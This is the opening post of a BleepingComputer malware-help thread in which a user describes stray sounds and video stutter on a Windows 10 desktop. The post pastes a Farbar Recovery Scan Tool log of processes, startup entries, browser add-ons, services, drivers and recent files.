Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected Windows 10


  • This topic is locked This topic is locked
7 replies to this topic

#1 Kevin07

Kevin07

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:09:13 AM

Posted 08 March 2016 - 11:18 PM

Hi,

 

Hope you're well

 

Recently having issue with my desktop, including unintentional sounds playing and unstable shutters of videos played. I have attached a few logs.

Kind regards,

Kevin 

 

Here are my logs:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by kevin (administrator) on DESKTOP-USOP2KE (09-03-2016 15:05:47)
Running from C:\
Loaded Profiles: kevin (Available Profiles: kevin)
Platform: Windows 10 Pro Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
() C:\Windows\System32\PnkBstrA.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Users\kevin\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
(Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe
(Spotify Ltd) C:\Users\kevin\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2789248 2016-03-03] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14040792 2015-07-15] (Realtek Semiconductor)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [804168 2016-02-17] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4513792 2014-05-22] (Brother Industries, Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [uTorrent] => C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe [2094080 2016-03-06] (BitTorrent Inc.)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3639280 2016-02-02] (Electronic Arts)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [Spotify] => C:\Users\kevin\AppData\Roaming\Spotify\Spotify.exe [6754928 2016-03-06] (Spotify Ltd)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [Spotify Web Helper] => C:\Users\kevin\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524848 2016-03-06] (Spotify Ltd)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-09] (Piriform Ltd)
BootExecute: autocheck autochk /k:C /k:F /k:D /k:E /k:G /k:H * 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 211.29.132.12 198.142.0.51 198.142.235.14
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{346a6b6a-5c99-47ff-8be1-c3b920aae974}: [DhcpNameServer] 211.29.132.12 198.142.0.51 198.142.235.14
Tcpip\..\Interfaces\{ed6fdde8-dd53-47a8-b0fc-23136ccb7468}: [DhcpNameServer] 198.18.0.1 198.18.0.2
 
Internet Explorer:
==================
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE03&ocid=UE03DHP
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-03-02] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-02-05] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-03-02] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default
FF NewTab: about:home
FF DefaultSearchEngine: Google
FF SelectedSearchEngine: Google
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-27] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-27] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1222172.dll [2015-11-19] (Adobe Systems, Inc.)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-03-02] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-02-05] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-03] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-03] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF SearchPlugin: C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\searchplugins\google-lavasoft.xml [2016-02-23]
FF Extension: Avira Browser Safety - C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\Extensions\abs@avira.com.xpi [2016-02-24]
FF Extension: Video AdBlock for Firefox - C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\Extensions\{a00bef25-f21a-4539-adbb-b179b29e2b92} [2016-01-10] [not signed]
 
Chrome: 
=======
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x86\widevinecdmadapter.dll (Google Inc.)
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Profile: C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-10]
CHR Extension: (Google Docs) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-10]
CHR Extension: (Google Drive) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-10]
CHR Extension: (Video AdBlock for Chrome) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\bknbnapaddjdnbilpmlacdkjdkjmbjhd [2016-01-10]
CHR Extension: (YouTube) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-10]
CHR Extension: (Google Search) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-10]
CHR Extension: (Google Sheets) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-10]
CHR Extension: (Avira Browser Safety) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-02-24]
CHR Extension: (Google Docs Offline) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-10]
CHR Extension: (Gmail) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-10]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [948392 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [466408 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [466408 2016-02-17] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1417592 2016-02-17] (Avira Operations GmbH & Co. KG)
S4 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2013-09-25] (Brother Industries, Ltd.) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2804976 2016-02-04] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1164672 2016-03-03] (NVIDIA Corporation)
S4 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
S4 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S4 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223008 2015-07-06] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1880960 2016-03-03] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6474112 2016-03-03] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2609024 2016-03-03] (NVIDIA Corporation)
S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-02] (Electronic Arts)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2016-01-01] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-12-30] ()
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [21632 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [184240 2015-11-06] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\system32\DRIVERS\avgfwd6a.sys [97208 2015-08-29] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [272304 2016-01-08] (AVG Technologies CZ, s.r.o.)
S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [284080 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [398256 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [260528 2016-01-22] (AVG Technologies CZ, s.r.o.)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [135880 2016-02-17] (Avira Operations GmbH & Co. KG)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [42416 2015-12-04] (AVG Technologies CZ, s.r.o.)
R0 Avguniva; C:\Windows\System32\DRIVERS\avguniva.sys [23472 2016-01-08] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [315840 2015-12-16] (AVG Technologies CZ, s.r.o.)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [146704 2016-02-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [73032 2016-02-17] (Avira Operations GmbH & Co. KG)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2016-02-17] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2016-02-17] (Disc Soft Ltd)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [47008 2013-07-30] ()
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [109272 2016-03-09] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184096 2015-06-29] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28032 2016-03-03] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2016-03-03] (NVIDIA Corporation)
R3 SaiK0CCC; C:\Windows\system32\DRIVERS\SaiK0CCC.sys [171016 2010-04-29] (Saitek)
R3 SaiU0CCC; C:\Windows\System32\drivers\SaiU0CCC.sys [41096 2010-04-29] (Saitek)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 cpuz138; \??\C:\Users\kevin\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-09 15:05 - 2016-03-09 15:05 - 00019407 _____ C:\FRST.txt
2016-03-09 14:55 - 2016-03-09 15:05 - 00000000 ____D C:\FRST
2016-03-09 14:54 - 2016-03-09 14:55 - 02374144 _____ (Farbar) C:\FRST64.exe
2016-03-09 14:46 - 2016-03-09 14:46 - 00000554 _____ C:\Users\kevin\Desktop\JRT.txt
2016-03-09 14:45 - 2016-03-09 14:45 - 01609216 _____ (Malwarebytes) C:\Users\kevin\Downloads\JRT (1).exe
2016-03-09 14:44 - 2016-03-09 14:45 - 01609216 _____ (Malwarebytes) C:\Users\kevin\Downloads\JRT.exe
2016-03-09 14:34 - 2016-03-09 15:03 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-03-09 14:34 - 2016-03-09 14:49 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 14:34 - 2016-03-09 14:34 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 14:33 - 2016-03-09 15:00 - 00000000 ____D C:\Users\kevin\Desktop\mbar
2016-03-09 14:33 - 2016-03-09 14:33 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-03-09 14:32 - 2016-03-09 14:33 - 16563352 _____ (Malwarebytes Corp.) C:\Users\kevin\Downloads\mbar-1.09.3.1001.exe
2016-03-09 12:19 - 2016-03-09 12:19 - 00000000 ____D C:\Program Files\hijackthis
2016-03-09 12:18 - 2016-03-09 12:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\kevin\Downloads\HijackThis (1).exe
2016-03-09 12:15 - 2016-03-09 12:15 - 00000000 ____D C:\Users\kevin\AppData\Local\ElevatedDiagnostics
2016-03-09 11:53 - 2016-03-01 16:31 - 00848168 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-03-09 11:53 - 2016-03-01 16:22 - 00709688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-03-09 11:53 - 2016-02-24 20:52 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-03-09 11:53 - 2016-02-24 20:51 - 07474528 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-03-09 11:53 - 2016-02-24 20:48 - 00713568 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-03-09 11:53 - 2016-02-24 20:47 - 01173344 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-03-09 11:53 - 2016-02-24 20:40 - 00513888 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-03-09 11:53 - 2016-02-24 20:34 - 01613664 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-03-09 11:53 - 2016-02-24 20:28 - 03449168 _____ (Microsoft Corporation) C:\Windows\system32\WSService.dll
2016-03-09 11:53 - 2016-02-24 20:15 - 01557768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-03-09 11:53 - 2016-02-24 19:58 - 00794888 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-03-09 11:53 - 2016-02-24 19:54 - 00127840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-03-09 11:53 - 2016-02-24 19:51 - 01322248 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-03-09 11:53 - 2016-02-24 19:50 - 00808800 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2016-03-09 11:53 - 2016-02-24 19:46 - 06607080 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-03-09 11:53 - 2016-02-24 19:43 - 00625000 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2016-03-09 11:53 - 2016-02-24 19:39 - 00358752 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-03-09 11:53 - 2016-02-24 19:39 - 00141560 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-03-09 11:53 - 2016-02-24 19:19 - 00670928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-03-09 11:53 - 2016-02-24 19:14 - 00216416 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 01997152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-03-09 11:53 - 2016-02-24 19:11 - 00957608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 00703840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2016-03-09 11:53 - 2016-02-24 19:11 - 00652392 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 00394080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2016-03-09 11:53 - 2016-02-24 19:11 - 00258280 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2016-03-09 11:53 - 2016-02-24 19:10 - 00630632 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2016-03-09 11:53 - 2016-02-24 19:10 - 00576864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-03-09 11:53 - 2016-02-24 19:09 - 00640472 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2016-03-09 11:53 - 2016-02-24 19:09 - 00147808 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2016-03-09 11:53 - 2016-02-24 19:06 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-03-09 11:53 - 2016-02-24 18:59 - 00294752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-03-09 11:53 - 2016-02-24 18:38 - 00187744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2016-03-09 11:53 - 2016-02-24 18:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenanceClient.dll
2016-03-09 11:53 - 2016-02-24 18:35 - 00540752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2016-03-09 11:53 - 2016-02-24 18:35 - 00523752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2016-03-09 11:53 - 2016-02-24 18:35 - 00220064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqmapi.dll
2016-03-09 11:53 - 2016-02-24 18:33 - 00538736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2016-03-09 11:53 - 2016-02-24 18:33 - 00141664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2016-03-09 11:53 - 2016-02-24 18:23 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-03-09 11:53 - 2016-02-24 18:23 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\UserDataPlatformHelperUtil.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\dafBth.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2016-03-09 11:53 - 2016-02-24 18:19 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
